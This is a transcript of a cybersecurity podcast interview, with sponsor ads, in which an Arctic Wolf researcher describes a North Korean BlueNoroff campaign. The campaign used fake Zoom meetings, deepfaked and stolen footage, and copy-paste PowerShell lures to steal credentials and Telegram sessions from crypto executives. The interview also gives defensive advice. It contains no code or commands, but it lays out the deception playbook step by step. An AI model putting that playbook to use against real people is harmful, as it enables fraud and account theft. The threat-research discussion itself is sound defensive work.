Maria Varmazis

You're listening to the Cyberwire Network powered by N2K. Do you know how the space and cybersecurity domains connect? T minus Space Cyber Briefing is your guide through the space based systems that expand the attack surface. I'm Maria Varmazis host here at N2K CyberWire and I'm excited to share that T minus is back now as a weekly podcast, the T minus Space Cyber Briefing. We have a new dedicated focus on two great things that are even better together. Space and cybersecurity. Because whether we realize it or not, we all depend on space based systems that are, by the way, increasingly Internet enabled. We're talking cybersecurity technologies, policies and organizations that are securing the critical space based infrastructure that powers, protects and connects our lives here on Earth.

Ismail Valenzuela

Earth.

Maria Varmazis

So join me for T minus Space Cyber Briefing. New episodes every Sunday.

Dave Bittner

Maybe that's an urgent message from your CEO. Or maybe it's a deep fake trying to target your business. Doppel is the AI native social engineering defense platform fighting back against impersonation and manipulation. As attackers use AI to make their tactics more sophisticated, Doppel uses it to fight back. From automatically dismantling cross channel attacks to building team resilience and more. Doppel outpacing what's next in social engineering. Learn more@doppel.com that's D O P E L dot com. Hello everyone and welcome to the Cyberwires Research Saturday. I'm Dave Buettner and this is our weekly conversation with researchers and analysts tracking down the threats and vulnerabilities, solving some of the hard problems and protecting ourselves in our rapidly evolving cyberspace. Thanks for joining us.

Ismail Valenzuela

This began with what appeared to be a legitimate business meeting invitation. The victim received a calendly invite that eventually directed them to a typo squatted Zoom domain hosting a fully simulated fake meeting environment which is like one of the most interesting pieces about this research.

Dave Bittner

That's Ismail Valenzuela, VP of Labs Threat Research and Intelligence at Arctic Wolf. The research we're discussing today is titled Blue Noroff uses Click Fix, fileless PowerShell and AI generated fake Zoom meetings to target the Web3 sector.

Ismail Valenzuela

Yeah, once the victim joined the meeting, the attackers then used some more like traditional social engineering to get the victim to install what looked like a. Like an update for Zoom. Right, a Zoom SDK update. But in reality that was the multi stage infection chain including PowerShell browser, credential theft, telegram session theft, persistence and even collecting screenshots.

Dave Bittner

Well, before we dig into a lot of the details here and the specifics you have said with fairly high degree of confidence that Blue Noroff is who you're attributing this to. What do we know about that group?

Ismail Valenzuela

Yeah, so this is a group that is associated to North Korea or the DPRK Democratic People's Republic of Korea. And this is essentially the same playbook that they have been using for quite some time, where the primary objective of their activities is essentially financial theft and the fact that they're targeting cryptocurrency executives, exchange operators, blockchain wallet developers. This is very consistent with the playbook for this group, Blunrov. And essentially what they want to do is to generate revenue to keep supporting the country's interests.

Dave Bittner

Well, let's walk through this step by step. I mean, you mentioned that this begins with a calendly invite. Can you take us through the details of what the victim experiences here?

Ismail Valenzuela

Yes. So the victim receives this invite and instead of going to the domain that they think that they're going, they use a typo squatted zoom domain. I like to call it like a casin domain or a lookalike domain that may look like legitimate, like something related to the day to day work, but they're essentially going to a domain that is controlled by the attackers. When they go to this zoom call, what they get is into like a fake meeting, which is very, very interesting because this meeting has content that is specifically tailored to the victim. So the attacker that shows that the attacker has been able to conduct detailed investigative work prior to set up every, every meeting, which is very, very interesting. At least one of the 100 targets that we identified beyond the primary victim that we investigated in this case has publicly disclosed on LinkedIn that their identity was used by the threat actor to approach other targets. Showing that there is like kind of a pipeline to, to, to lure more people into these, into, into this attack. As we document in the report and when the victim would join the call, they would see videos, they would see Personas that are related to their day to day job. So if they were in the crypto world, they would see relevant people from the crypto world. Some of this content would be scraped out of YouTube webinars and other public resources. Some of this content would be stolen from the footage recorded from previous victims that would be incorporated into their library at the time of this recording. I can tell you there's more than a thousand videos in this library.

Dave Bittner

Help me understand, I mean this part of it, because it seems like a tremendous amount of effort that goes into this particular campaign here. Were they using AI generated images. Were they cleverly using the stolen webcam footage? Are they looping things in the background? What are they doing?

Ismail Valenzuela

What we found is that they use a combination of different things, scraping public videos out there from YouTube or webinars and also deepfakes that they have generated along with actual footage recorded from victims that got infected. And then they would join this call, and you could see how their faces look a little bit confused. They're clicking on links, they're trying to find out what's going on. And this is directly stolen out of their computer. As we explained in the report, they would use a specific API to enable the recording of the webcam and the microphone to gather this information from the victims.

Dave Bittner

Yeah, it's interesting. I mean, how many of us join a Zoom meeting? And that's exactly the first thing you're used to seeing, are people just getting settled in and trying to make sure everything's working. So it all seems normal at first, I suppose.

Ismail Valenzuela

Yeah, absolutely. Absolutely. And we have evidence that the captured footage enters kind of like a production pipeline, as professionals would do. The attacker actually process it, process the video through Adobe Premiere Pro. And it's worth mentioning that at least one image was edited with Microsoft Paint. So I guess, you know, maybe they run out of budget, I don't know.

Dave Bittner

Going old school. Right, right, right. So let's continue down the pathway here. I mean, I'm a victim and I've helped. I've entered this Zoom meeting, even though it's not a real Zoom meeting. What happens next?

Ismail Valenzuela

Yes, so what happened next is that the victim would receive some communications that, oh, you know, maybe something is not right. We cannot hear you or we cannot see you. Well, they would continue the social engineering by trying to convince the victim to install an update. Right. For Zoom. And I'm saying Zoom here. But I have to say, since the publication of our report, we've seen the attacker moving away from Zoom and using Microsoft Teams, teams themed lures towards other organizations, including outside of crypto now enterprise software, business services. But that's kind of the idea, right? Once they convince you that you are among peers or joining a webinar, a call with people that have that share same interests, they would ask you to execute something on your machine. That's where the powershell comes. Comes in or, you know, a binary in some cases. This is not that different from the fake captcha and other social engineering attacks that we see on a regular basis, where they convince you to just copy and paste some commands on your machine that are going to install the malicious impl.

Dave Bittner

We'll be right back.

Maria Varmazis

Study and play come together on a Windows 11 PC and for a limited time, college students get the best of both worlds. Get the unreal college deal Everything you need to study and play with select Windows 11 PCs. Eligible students get a year of Microsoft 365 Premium and a year of Xbox Game Pass ultimate with a custom color Xbox wireless controller. Learn more@windows10.com studentoffer while supplies last ends June 30 terms@akams.collegepc when you need to build up your team to handle the growing chaos at work, use Indeed Sponsored Jobs. It gives your job post the boost it needs to be seen and helps reach people with the right skills, certifications and more. Spend less time searching and more time actually interviewing candidates who check all your boxes. Listeners of this show will get a $75 sponsored job credit@ Indeed.com podcast. That's Indeed.com podcast. Terms and conditions apply. Need a hiring hero? This is a job for Indeed Sponsored Jobs.

Dave Bittner

And your research points out that once they go down this path, it is minutes before they've had the system fully compromised.

Ismail Valenzuela

That is correct. Once the attack, once the machine is fully compromised, it could be like less than five minutes. The attacker is stealing the telegram sessions, the browser credentials, the webcam footage, the audio from the microphone. And then they use these compromised accounts, these identities, to approach other victims. So now that means that these messages coming to you through telegram or these invitations may come from people that you trust.

Dave Bittner

Now, I'm on this zoom call and they've convinced me to run this software, they've installed the malware. Are they keeping me on the line? Or are they, am I being discarded and they move on to the next person?

Ismail Valenzuela

Well, I mean, based on the information that we have, we haven't like joined it like this calls necessarily. We have seen like all the analysis that comes out of the investigation. But according to the videos that we have seen, the victim may have been connected for some time. But then, I mean, enough time for the attacker to be able to convince you to do something, to install something on your computer. Once they have the information, there's no need to keep you there for any longer. So if the call disconnects, it's like, okay, something didn't work. What is going on? But it doesn't really matter at that point. Those identities have been stolen. And as I said before, we have seen some victims in social media, LinkedIn X mentioning that, hey, my identity has been stolen and it has been used to approach other People in my network.

Dave Bittner

How did Arctic Wolf pivot from this initial intrusion that you investigated to identifying 100 additional targets?

Ismail Valenzuela

Well, so part of that is based on our amazing threat research team. I have to say that we track threat actors. We have been doing this for a long time. And also based on our telemetry, the ability to pivot from endpoint data, which was the very first indication or signal that we got here, to the ability to pivot to other infrastructure, to people, to network telemetry, cloud telemetry from over 10,000 customers, and a lot of the open source intelligence that we gather out there too.

Dave Bittner

Was there anything that stood out about the victims themselves in terms of who they were going after? Are there particular parts of the world or particular industries that they seem to be targeting?

Ismail Valenzuela

Yeah, that's an interesting1. About 45%, 50% of the victims were CEOs, CEOs and thousands founders. About 70% were related to blockchain exchanges, but also venture capital, venture capital companies. The geographic spread was over 20 countries. So that tells you that this is a well resourced operation with language capabilities, cultural awareness to do social engineering across multiple regions. And some of the individuals that we have found that were victims of these were kind of like well known, some of them public figures, people in different industries that have a high profile.

Dave Bittner

It's a good reminder that these sorts of things can happen to anyone.

Ismail Valenzuela

Absolutely. In terms of countries, the majority were focused on the United States, but we also found Singapore, United Kingdom, and we're seeing since the publication of our research that they're expanding to other geographies and other businesses too.

Dave Bittner

In terms of the attribution, what can you share with us in terms of evidence that supported your high confidence attribution that this was the North Koreans?

Ismail Valenzuela

Well, we typically talk, when we talk about attribution, we typically talk about several things. You know, the indicators of compromise, the infrastructure that they use. As I said before, we're tracking these threat actors for a long time. And if you look at the publications that we have done in the past, you're going to see that this is not the first Blunaroff publication that we have done. And the playbook, very, very distinct. And the motivation, the first motivation is, as I said before, financial, to support the regime and to bypass the embargoes right from the UN to this country. But we're not the only ones that we have seen this. There is other peers in the industry that have been reporting the same playbook coming out of bluerof, which always adds additional confidence to Our assessment.

Dave Bittner

So what are the takeaways here for defenders? What sort of things should security teams take away from your research?

Ismail Valenzuela

Well, the first one that you already talked about, it's Dave. It's essentially training, right? Proactive security training, security awareness. This is one of the oldest things in cybersecurity. Knowing that, you know, you have to validate every single request, recognize the red flags of phishing, and routinely verify meeting requests, especially when it is something that looks suspicious via secondary contact method. Browser security. This is kind of a new field as well in cybersecurity. Well, maybe not so new for those that we have been around for a long time, but we see very specific threats against browsers these days. There's a particular API, get user media that should only be available to like trusted domains. Clipboard monitoring restrictions where feasible. Email and calendar security as well. Inspecting these invites, especially when the invitations come from domains that look like domains we recognize, but they're not really those domains. And of course, threat intelligence, threat modeling, knowing exactly that if you are in the business of cryptocurrency, if you have wallets with high value, if you're a public figure, if you have a high position in organization, know that these threat actors are going after you. And, and knowing this should drive the, the countermeasures. This is what I usually call think red or blue, right? Think as an attacker to become a better defender.

Dave Bittner

You know, I think about an attack like this and particularly the element with calendly I would fall for because I feel like this is such a part of my day to day, right? Responding to calendar invites, sending out calendar invites, meeting with people in these online conference sessions like you and I are doing right now. It's such a part of my routine that I have to wonder, would I stop to check because I'm in such a habit of doing this every day.

Ismail Valenzuela

Well, it's funny you mentioned that, Dave, because I joined your podcast through this calendly invite and first thing I did when I clicked on it, it's like, hold on. Before clicking on it, I was like, hold on a second. Is this actually Dave or not? Good for you. But yeah, that's the reality. No one is free from, from any of these. But that's why you want to have like several controls along the way. Because if something, you know, fails, it could be, you know, you under stress, checking, you know, doing something urgently on your phone or at least you have other layers and also having the information right, listening to this podcast, having the right information to say, hold on a second, I'M going to, you know, verify and double check, especially these type of requests.

Dave Bittner

Our thanks to Ismail Valenzuela from Arctic Wolf for joining us. The research is titled Blue Noroff uses Click Fix, Fileless, PowerShell and AI generated fake Zoom meetings to turn target the Web3 sector. We'll have a link in the Show Notes and that's Research Saturday brought to you by N2K CyberWire. We'd love to know what you think of this podcast. Your feedback ensures we deliver the insights that keep you a step ahead in the rapidly changing world of cybersecurity. If you like our show, please share a rating and review in your favorite podcast app. Please also fill out the survey in the Show Notes or send an email to cyberwire2connect. This episode was produced by Liz Stokes. We're mixed by Elliot Peltzman and Trey Hester. Our executive producer is Jennifer Ibin, Peter Kilpea is our publisher and I'm Dave Bittner. Thanks for listening. We'll see you back here next time.

Maria Varmazis

Some Follow the Noise Bloomberg Follows the Money Whether it's the funds fueling AI or crypto's trillion dollar swings, there's a money side to every story. Get the money side of the story. Subscribe now@bloomberg.com.